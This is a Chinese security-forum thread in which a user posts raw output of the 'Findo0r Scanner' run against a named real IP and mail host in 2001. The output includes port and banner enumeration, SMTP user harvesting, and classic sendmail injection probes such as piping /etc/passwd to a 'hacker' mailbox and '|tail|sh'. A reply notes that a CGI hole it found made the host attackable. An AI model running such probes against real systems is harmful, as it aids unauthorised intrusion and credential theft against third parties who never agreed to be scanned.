|
![]() | 作者: pzh339 [pzh339]
![]() |
登录 |
[Findo0r Scanner] 扫描目标:211.163.66.20 扫描选项: FTP漏洞 SMTP漏洞 FINGER漏洞 CGI漏洞 开始扫描...... 目标IP地址为:211.163.66.20 扫描目标主机开放的端口: 21号端口(ftp)开放! 25号端口(smtp)开放! 53号端口(domain)开放! 80号端口(未知)开放! 110号端口(pop3)开放! 开始扫描FTP漏洞: FTP服务器的Banner: 220 Serv-U FTP-Server v2.5i for WinSock ready... 测试匿名用户 没有匿名用户 开始扫描SMTP漏洞: SMTP服务器的Banner: 220 X1 NT-ESMTP Server huizhou.cngb.com (IMail 6.06 EVAL 984-1) 211 DATA EXPN HELO MAIL NOOP QUIT RCPT RSET SAML SEND SOML TURN VRFY 可以使用RCPT命令获得用户名列表. 可以使用VRFY命令获得用户名列表. 可以使用EXPN命令获得用户名列表. 250 hello huizhou.cngb.com 250 ok 尝试利用RCPT命令获得目标机上存在的一些常见用户名: 250 ok its for <root> 250 ok its for <account> 250 ok its for <info> 检查decode别名: 550 list not found 502 unimplemented command 检查漏洞 502 unimplemented command 检查debug漏洞 502 unimplemented command 检查kill漏洞 502 unimplemented command 检查wiz漏洞 502 unimplemented command 检查rcpt to: /tmp/.rhosts漏洞 550 unknown user </tmp/.rhosts> 检查+ +漏洞 502 unimplemented command 检查RSET漏洞 250 ok its reset 检查mail from: |/bin/mail hacker < /etc/passwd漏洞 501 unacceptable mail address 检查RSET漏洞 250 ok its reset 检查mail from: |tail|sh漏洞 501 unacceptable mail address 开始扫描FINGER漏洞: 目标没有开放FINGER服务... 开始扫描CGI漏洞: WWW服务器的Banner: HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Content-Location: http://211.163.66.20/index.htm Date: Tue, 25 Dec 2001 12:18:30 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Fri, 21 Dec 2001 01:41:02 GMT ETag: "4056618cc089c11:47a2" Content-Length: 34299 开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待... 发现/?PageServices漏洞 扫描完毕!!! [Findo0r Scanner] 扫描目标:211.163.66.20 扫描选项: FTP漏洞 SMTP漏洞 FINGER漏洞 CGI漏洞 开始扫描...... 目标IP地址为:211.163.66.20 扫描目标主机开放的端口: 25号端口(smtp)开放! 开始扫描FTP漏洞: FTP服务器的Banner: 220 Serv-U FTP-Server v2.5i for WinSock ready... 测试匿名用户 没有匿名用户 开始扫描SMTP漏洞: 目标没有开放SMTP服务... 开始扫描FINGER漏洞: 目标没有开放FINGER服务... 开始扫描CGI漏洞: 目标没有开放WWW服务... 扫描完毕!!! [Findo0r Scanner] 扫描目标:211.163.66.20 扫描选项: FTP漏洞 SMTP漏洞 FINGER漏洞 CGI漏洞 开始扫描...... 目标IP地址为:211.163.66.20 扫描目标主机开放的端口: 开始扫描FTP漏洞: 目标没有开放FTP服务... 开始扫描SMTP漏洞: 目标没有开放SMTP服务... 开始扫描FINGER漏洞: 目标没有开放FINGER服务... 开始扫描CGI漏洞: 目标没有开放WWW服务... 扫描完毕!!! |
地主 发表时间: 1/4 16:20 |
![]() | 回复: mxxiang99 [mxxiang99] ![]() |
登录 |
你怎么废话在多呀! 自己买点书看一看不就知道了吗? 那有时间一个一个的解释!!! 这又不是课堂 |
B1层 发表时间: 1/4 16:49 |
![]() | 回复: DarK-Z [bridex] ![]() |
登录 |
发现/?PageServices漏洞 这当时最多机器出现的CGI漏洞(一切打过最新补丁的WEB服务器还会出现这漏洞,不解!),当时用这漏洞很难,现在回想真好啊...可以攻击了. ![]() |
B2层 发表时间: 09-08-15 17:58 |
![]() | 回复: boli13 [boli13] ![]() |
登录 |
这台电脑一定被人入侵过,还留下后门,是哪个黑客这么不敬业,应该清楚一下日志。 |
B3层 发表时间: 09-09-25 19:00 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号